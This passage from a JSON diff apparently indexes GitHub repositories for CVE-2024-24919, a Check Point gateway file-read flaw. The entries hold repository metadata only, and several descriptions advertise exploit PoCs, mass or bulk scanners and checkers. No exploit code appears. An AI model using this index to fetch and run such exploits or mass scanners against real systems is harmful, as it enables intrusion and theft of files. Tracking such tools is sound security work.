"score": 0, + "subscribers_count": 1 + }, + { + "id": 808225578, + "name": "CVE-2024-24919", + "full_name": "LucasKatashi\/CVE-2024-24919", + "owner": { + "login": "LucasKatashi", + "id": 41309932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41309932?v=4", + "html_url": "https:\/\/github.com\/LucasKatashi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasKatashi\/CVE-2024-24919", + "description": "CVE-2024-24919 Exploit PoC", + "fork": false, + "created_at": "2024-05-30T16:23:18Z", + "updated_at": "2024-08-09T11:48:41Z", + "pushed_at": "2024-05-30T17:08:11Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-24919", + "exploit", + "lfi", + "poc" + ], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808251805, + "name": "CVE-2024-24919", + "full_name": "yagyuufellinluvv\/CVE-2024-24919", + "owner": { + "login": "yagyuufellinluvv", + "id": 170684196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170684196?v=4", + "html_url": "https:\/\/github.com\/yagyuufellinluvv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yagyuufellinluvv\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-30T17:26:08Z", + "updated_at": "2024-06-01T00:09:54Z", + "pushed_at": "2024-06-01T00:09:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808315341, + "name": "CVE-2024-24919", + "full_name": "Bytenull00\/CVE-2024-24919", + "owner": { + "login": "Bytenull00", + "id": 19710178, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19710178?v=4", + "html_url": "https:\/\/github.com\/Bytenull00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bytenull00\/CVE-2024-24919", + "description": "Quick and simple script that takes as input a file with multiple URLs to check for the CVE-2024-24919 vulnerability in CHECKPOINT", + "fork": false, + "created_at": "2024-05-30T20:14:19Z", + "updated_at": "2024-06-09T20:21:52Z", + "pushed_at": "2024-05-30T21:49:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808371269, + "name": "CVE-2024-24919", + "full_name": "am-eid\/CVE-2024-24919", + "owner": { + "login": "am-eid", + "id": 95753520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95753520?v=4", + "html_url": "https:\/\/github.com\/am-eid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/am-eid\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-30T23:52:53Z", + "updated_at": "2024-05-31T00:06:43Z", + "pushed_at": "2024-05-31T00:06:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808389014, + "name": "CVE-2024-24919", + "full_name": "P3wc0\/CVE-2024-24919", + "owner": { + "login": "P3wc0", + "id": 66764041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66764041?v=4", + "html_url": "https:\/\/github.com\/P3wc0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/P3wc0\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T01:14:19Z", + "updated_at": "2024-05-31T01:39:05Z", + "pushed_at": "2024-05-31T01:39:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808505785, + "name": "CVE-2024-24919", + "full_name": "zam89\/CVE-2024-24919", + "owner": { + "login": "zam89", + "id": 3533227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3533227?v=4", + "html_url": "https:\/\/github.com\/zam89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zam89\/CVE-2024-24919", + "description": "Simple POC Python script that check & leverage Check Point CVE-2024-24919 vulnerability (Wrong Check Point)", + "fork": false, + "created_at": "2024-05-31T07:59:17Z", + "updated_at": "2024-05-31T14:05:10Z", + "pushed_at": "2024-05-31T08:16:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-24919", + "exploit", + "poc", + "python3" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808506486, + "name": "CVE-2024-24919", + "full_name": "satriarizka\/CVE-2024-24919", + "owner": { + "login": "satriarizka", + "id": 42266999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42266999?v=4", + "html_url": "https:\/\/github.com\/satriarizka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satriarizka\/CVE-2024-24919", + "description": "A simple bash and python script to check for the vulnerability CVE-2024-24919", + "fork": false, + "created_at": "2024-05-31T08:01:13Z", + "updated_at": "2024-05-31T09:02:26Z", + "pushed_at": "2024-05-31T08:37:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2024-24919", + "poc", + "python", + "shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808560094, + "name": "CVE-2024-24919", + "full_name": "RevoltSecurities\/CVE-2024-24919", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-24919", + "description": "An Vulnerability detection and Exploitation tool for CVE-2024-24919", + "fork": false, + "created_at": "2024-05-31T10:18:36Z", + "updated_at": "2024-12-24T19:27:30Z", + "pushed_at": "2024-06-05T11:38:12Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808586285, + "name": "CVE-2024-24919", + "full_name": "Vulnpire\/CVE-2024-24919", + "owner": { + "login": "Vulnpire", + "id": 89225495, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89225495?v=4", + "html_url": "https:\/\/github.com\/Vulnpire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnpire\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T11:29:03Z", + "updated_at": "2024-05-31T11:36:29Z", + "pushed_at": "2024-05-31T11:36:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808595288, + "name": "CVE-2024-24919-POC", + "full_name": "seed1337\/CVE-2024-24919-POC", + "owner": { + "login": "seed1337", + "id": 99613932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99613932?v=4", + "html_url": "https:\/\/github.com\/seed1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seed1337\/CVE-2024-24919-POC", + "description": null, + "fork": false, + "created_at": "2024-05-31T11:52:59Z", + "updated_at": "2024-10-21T13:18:17Z", + "pushed_at": "2024-05-31T22:55:07Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 47, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808601031, + "name": "CVE-2024-24919", + "full_name": "0xYumeko\/CVE-2024-24919", + "owner": { + "login": "0xYumeko", + "id": 154844497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154844497?v=4", + "html_url": "https:\/\/github.com\/0xYumeko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xYumeko\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T12:08:28Z", + "updated_at": "2024-06-07T12:15:19Z", + "pushed_at": "2024-06-01T12:22:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808601596, + "name": "CVE-2024-24919-Check-Point-Remote-Access-VPN", + "full_name": "Praison001\/CVE-2024-24919-Check-Point-Remote-Access-VPN", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-24919-Check-Point-Remote-Access-VPN", + "description": null, + "fork": false, + "created_at": "2024-05-31T12:10:05Z", + "updated_at": "2024-06-02T12:40:00Z", + "pushed_at": "2024-06-02T12:39:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808610745, + "name": "CVE-2024-24919-nuclei-templater", + "full_name": "smackerdodi\/CVE-2024-24919-nuclei-templater", + "owner": { + "login": "smackerdodi", + "id": 36116795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36116795?v=4", + "html_url": "https:\/\/github.com\/smackerdodi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smackerdodi\/CVE-2024-24919-nuclei-templater", + "description": "Nuclei template for CVE-2024-24919 ", + "fork": false, + "created_at": "2024-05-31T12:33:34Z", + "updated_at": "2024-06-10T03:36:49Z", + "pushed_at": "2024-05-31T12:35:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808625857, + "name": "CVE-2024-24919", + "full_name": "GoatSecurity\/CVE-2024-24919", + "owner": { + "login": "GoatSecurity", + "id": 153397256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153397256?v=4", + "html_url": "https:\/\/github.com\/GoatSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GoatSecurity\/CVE-2024-24919", + "description": "CVE-2024-24919 exploit", + "fork": false, + "created_at": "2024-05-31T13:11:40Z", + "updated_at": "2025-01-07T23:29:33Z", + "pushed_at": "2024-05-31T15:50:57Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808722851, + "name": "CVE-2024-24919", + "full_name": "GlobalsecureAcademy\/CVE-2024-24919", + "owner": { + "login": "GlobalsecureAcademy", + "id": 30742368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30742368?v=4", + "html_url": "https:\/\/github.com\/GlobalsecureAcademy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GlobalsecureAcademy\/CVE-2024-24919", + "description": "Exploit tool to validate CVE-2024-24919 vulnerability on Checkpoint Firewall VPNs", + "fork": false, + "created_at": "2024-05-31T17:14:48Z", + "updated_at": "2024-06-07T05:01:41Z", + "pushed_at": "2024-05-31T17:31:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808733143, + "name": "CVE-2024-24919", + "full_name": "nexblade12\/CVE-2024-24919", + "owner": { + "login": "nexblade12", + "id": 168243165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168243165?v=4", + "html_url": "https:\/\/github.com\/nexblade12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nexblade12\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T17:41:08Z", + "updated_at": "2024-06-02T01:37:00Z", + "pushed_at": "2024-05-31T17:51:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808745521, + "name": "CVE-2024-24919", + "full_name": "un9nplayer\/CVE-2024-24919", + "owner": { + "login": "un9nplayer", + "id": 75741506, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75741506?v=4", + "html_url": "https:\/\/github.com\/un9nplayer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/un9nplayer\/CVE-2024-24919", + "description": "This repository contains a proof-of-concept (PoC) exploit for CVE-2024-24919, a critical vulnerability discovered in Check Point SVN. The vulnerability allows for reading system files. CVE ID: CVE-2024-24919", + "fork": false, + "created_at": "2024-05-31T18:14:19Z", + "updated_at": "2024-12-30T22:04:33Z", + "pushed_at": "2024-06-05T16:13:51Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808815211, + "name": "CVE-2024-24919", + "full_name": "0xkalawy\/CVE-2024-24919", + "owner": { + "login": "0xkalawy", + "id": 31960035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31960035?v=4", + "html_url": "https:\/\/github.com\/0xkalawy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkalawy\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T22:07:21Z", + "updated_at": "2024-05-31T23:39:55Z", + "pushed_at": "2024-05-31T23:39:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808853728, + "name": "CVE-2024-24919", + "full_name": "Cappricio-Securities\/CVE-2024-24919", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-24919", + "description": "Check Point Security Gateway (LFI)", + "fork": false, + "created_at": "2024-06-01T01:33:00Z", + "updated_at": "2024-06-24T10:03:27Z", + "pushed_at": "2024-06-24T10:02:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "check-point-security-gateway", + "cve-2024-24919", + "cve-2024-24919-exploit", + "cve-2024-24919-lfi", + "cve-2024-24919-poc", + "cve-2024-24919-scanner", + "information-disclosure", + "lfi", + "path-traversal" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 808862082, + "name": "CVE-2024-24919", + "full_name": "fernandobortotti\/CVE-2024-24919", + "owner": { + "login": "fernandobortotti", + "id": 61474323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61474323?v=4", + "html_url": "https:\/\/github.com\/fernandobortotti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fernandobortotti\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-01T02:20:28Z", + "updated_at": "2024-06-19T18:40:50Z", + "pushed_at": "2024-06-01T03:44:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808870264, + "name": "CVE-2024-24919", + "full_name": "nicolvsrlr27\/CVE-2024-24919", + "owner": { + "login": "nicolvsrlr27", + "id": 62434396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62434396?v=4", + "html_url": "https:\/\/github.com\/nicolvsrlr27", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nicolvsrlr27\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-01T03:05:35Z", + "updated_at": "2024-06-01T03:05:35Z", + "pushed_at": "2024-06-01T03:05:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808874379, + "name": "CVE-2024-24919", + "full_name": "gurudattch\/CVE-2024-24919", + "owner": { + "login": "gurudattch", + "id": 119776344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119776344?v=4", + "html_url": "https:\/\/github.com\/gurudattch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gurudattch\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-01T03:26:29Z", + "updated_at": "2024-12-20T02:18:20Z", + "pushed_at": "2024-06-01T05:56:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808967131, + "name": "CVE-2024-24919", + "full_name": "YN1337\/CVE-2024-24919", + "owner": { + "login": "YN1337", + "id": 88143447, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88143447?v=4", + "html_url": "https:\/\/github.com\/YN1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YN1337\/CVE-2024-24919", + "description": "Mass scanner for CVE-2024-24919", + "fork": false, + "created_at": "2024-06-01T09:54:13Z", + "updated_at": "2024-06-01T10:07:55Z", + "pushed_at": "2024-06-01T10:07:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808982882, + "name": "CVE-2024-24919-Bulk-Scanner", + "full_name": "ifconfig-me\/CVE-2024-24919-Bulk-Scanner", + "owner": { + "login": "ifconfig-me", + "id": 25315805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4", + "html_url": "https:\/\/github.com\/ifconfig-me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-24919-Bulk-Scanner", + "description": "CVE-2024-24919 [Check Point Security Gateway Information Disclosure]", + "fork": false, + "created_at": "2024-06-01T10:51:14Z", + "updated_at": "2024-11-18T06:27:33Z", + "pushed_at": "2024-06-02T06:36:57Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 809000136, + "name": "CVE-2024-24919-Checkpoint-Firewall-VPN-Check", + "full_name": "r4p3c4\/CVE-2024-24919-Checkpoint-Firewall-VPN-Check", + "owner": { + "login": "r4p3c4", + "id": 111358086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4", + "html_url": "https:\/\/github.com\/r4p3c4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-24919-Checkpoint-Firewall-VPN-Check", + "description": "Esta herramienta se utiliza para validar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall", + "fork": false, + "created_at": "2024-06-01T11:54:39Z", + "updated_at": "2024-06-01T11:59:15Z", + "pushed_at": "2024-06-01T11:56:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809002220, + "name": "CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN", + "full_name": "r4p3c4\/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN", + "owner": { + "login": "r4p3c4", + "id": 111358086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4", + "html_url": "https:\/\/github.com\/r4p3c4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN", + "description": "Herramienta de explotación para explotar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall", + "fork": false, + "created_at": "2024-06-01T12:02:43Z", + "updated_at": "2024-06-03T19:27:04Z", + "pushed_at": "2024-06-01T12:20:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809246469, + "name": "CVE-2024-24919-CHECKPOINT", + "full_name": "J4F9S5D2Q7\/CVE-2024-24919-CHECKPOINT", + "owner": { + "login": "J4F9S5D2Q7", + "id": 171471588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171471588?v=4", + "html_url": "https:\/\/github.com\/J4F9S5D2Q7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J4F9S5D2Q7\/CVE-2024-24919-CHECKPOINT", + "description": null, + "fork": false, + "created_at": "2024-06-02T06:17:06Z", + "updated_at": "2024-06-09T22:34:29Z", + "pushed_at": "2024-06-02T07:19:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809275692, + "name": "CVE-2024-24919-Exploit", + "full_name": "mr-kasim-mehar\/CVE-2024-24919-Exploit", + "owner": { + "login": "mr-kasim-mehar", + "id": 136003436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136003436?v=4", + "html_url": "https:\/\/github.com\/mr-kasim-mehar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-kasim-mehar\/CVE-2024-24919-Exploit", + "description": null, + "fork": false, + "created_at": "2024-06-02T08:19:50Z", + "updated_at": "2024-09-15T08:14:14Z", + "pushed_at": "2024-06-02T08:24:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809355149, + "name": "CVE-2024-24919-POC", + "full_name": "B1naryo\/CVE-2024-24919-POC", + "owner": { + "login": "B1naryo", + "id": 16160577, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16160577?v=4", + "html_url": "https:\/\/github.com\/B1naryo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1naryo\/CVE-2024-24919-POC", + "description": null, + "fork": false, + "created_at": "2024-06-02T13:09:51Z", + "updated_at": "2024-06-02T13:18:27Z", + "pushed_at": "2024-06-02T13:18:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809370211, + "name": "CVE-2024-24919---Poc", + "full_name": "Expl0itD0g\/CVE-2024-24919---Poc", + "owner": { + "login": "Expl0itD0g", + "id": 170868461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170868461?v=4", + "html_url": "https:\/\/github.com\/Expl0itD0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Expl0itD0g\/CVE-2024-24919---Poc", + "description": "a Proof of Concept of CVE-2024-24919", + "fork": false, + "created_at": "2024-06-02T13:58:36Z", + "updated_at": "2024-06-03T19:58:18Z", + "pushed_at": "2024-06-02T14:00:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809483907, + "name": "CVE-2024-24919-Sniper", + "full_name": "bigb0x\/CVE-2024-24919-Sniper", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-24919-Sniper", + "description": "CVE-2024-24919 Sniper - A powerful tool for scanning Check Point Security Gateway CVE-2024-24919 vulnerability. Supports single & bulk scanning, multithreading, and generates detailed CSV reports. Ideal for penetration testers and security researchers.", + "fork": false, + "created_at": "2024-06-02T20:16:22Z", + "updated_at": "2024-06-03T23:56:17Z", + "pushed_at": "2024-06-02T23:00:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809679765, + "name": "cve-2024-24919-checker", + "full_name": "birdlex\/cve-2024-24919-checker", + "owner": { + "login": "birdlex", + "id": 3228984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3228984?v=4", + "html_url": "https:\/\/github.com\/birdlex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/birdlex\/cve-2024-24919-checker", + "description": null, + "fork": false, + "created_at": "2024-06-03T08:39:09Z", + "updated_at": "2024-06-04T06:54:59Z", + "pushed_at": "2024-06-04T06:54:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809769497, + "name": "CVE-2024-24919-Exploit", + "full_name": "Rug4lo\/CVE-2024-24919-Exploit", + "owner": { + "login": "Rug4lo", + "id": 123998963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123998963?v=4", + "html_url": "https:\/\/github.com\/Rug4lo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rug4lo\/CVE-2024-24919-Exploit", + "description": " CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.", + "fork": false, + "created_at": "2024-06-03T12:18:35Z", + "updated_at": "2024-06-24T12:34:39Z", + "pushed_at": "2024-06-03T14:09:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-24919" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809802562, + "name": "CVE-2024-24919-PoC", + "full_name": "0nin0hanz0\/CVE-2024-24919-PoC", + "owner": { + "login": "0nin0hanz0", + "id": 154326653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154326653?v=4", + "html_url": "https:\/\/github.com\/0nin0hanz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0nin0hanz0\/CVE-2024-24919-PoC", + "description": null, + "fork": false, + "created_at": "2024-06-03T13:30:31Z", + "updated_at": "2024-12-13T07:06:39Z", + "pushed_at": "2024-07-27T12:46:44Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + 